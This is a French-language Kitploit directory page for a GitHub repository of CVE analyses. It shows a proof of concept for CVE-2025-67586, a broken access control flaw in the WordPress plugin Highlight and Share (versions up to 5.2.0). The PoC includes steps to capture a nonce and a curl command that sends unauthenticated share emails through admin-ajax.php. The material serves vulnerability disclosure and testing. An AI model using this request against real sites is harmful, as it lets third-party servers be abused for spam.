Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE — analyses pour (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
Outils/GitHubGitHub/r0xtsec/cve
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubr0xtsec/cve

CVE

analyses pour (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE

Analyses pour (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

root@kitploit:~
--------------   CVE-2025-67586 Exploit PoC   --------------
  • Titre de l'exploit : WordPress Plugin 5.2.0 - Contrôle d'accès cassé
  • Lien du logiciel : https://wordpress.org/plugins/highlight-and-share/
  • Version : <= 5.2.0 (REQUISE)
  • CVE : CVE-2025-67586

==> Description Une vulnérabilité de contrôle d'accès cassé existe dans un plugin WordPress développé par DLX Plugins. Le plugin expose une action AJAX non authentifiée qui permet aux attaquants d'abuser de la fonctionnalité « Share via Email » sans vérifications de permissions appropriées.

Un attaquant non authentifié peut réutiliser un nonce de publication valide pour déclencher des demandes de partage par e-mail, conduisant à l'envoi d'e-mails non autorisés (spam / abus) sans authentification de l'utilisateur.

==> Privilèges requis Aucun (non authentifié)

==> Preuve de concept (PoC)

Étape 1 : Choisissez un site Web avec le plugin installé

Étape 2 : Obtenez un nonce valide

  1. Ouvrez un article public.
  2. Surlignez du texte et cliquez sur Share via Email.
  3. Ouvrez les outils de développement → Réseau → XHR.
  4. Envoyez l'e-mail une fois.
  5. Capturez la requête contenant : action=has_email_social_modal nonce= post_id=

Étape 3 : Exploitation via une requête non authentifiée

commande bash : (remplacez l'URL du site Web, l'URL de l'article et le nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> Réponse JSON attendue :

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

Télécharger l’outil